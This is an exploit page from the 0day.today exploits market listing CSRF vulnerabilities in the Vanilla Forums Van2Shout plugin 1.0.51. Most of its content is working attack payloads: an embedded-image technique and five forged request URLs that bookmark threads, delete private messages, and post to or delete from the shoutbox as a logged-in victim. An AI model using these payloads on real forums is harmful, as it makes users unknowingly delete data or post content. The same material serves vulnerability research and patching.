[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Vanilla Forums Van2Shout Plugin 1.0.51 - CSRF Vulnerabilities

Author
Henry Hoggard
Risk
[
Security Risk High
]
0day-ID
0day-ID-20655
Category
web applications
Date add
15-04-2013
Platform
php
You can exploit these by having the user visit a thread with the img src
of the below urls.
 
eg <img
src="http://site.org/index.php=/vanilla/discussion/bookmark/1337?> where
1337 is the id.
 
  
 
Bookmark CSRF:
 
http://site.org/index.php=/vanilla/discussion/bookmark/1337
 
UnBookmark CSRF
 
http://site.org/index.php=/vanilla/discussion/bookmark/1337?
 
Delete Message CSRF
 
http://site.org/index.php=/messages/clear/1337
 
Post to Van2Shout Chat Box CSRF
 
http://site.org/index.php?p=/plugin/Van2ShoutData&newpost=testmessage
 
Delete Message from Van2Shout Chatbox CSRF
 
http://site.org/index.php?p=/plugin/Van2ShoutData&del=1337

#  0day.today [2024-11-15]  #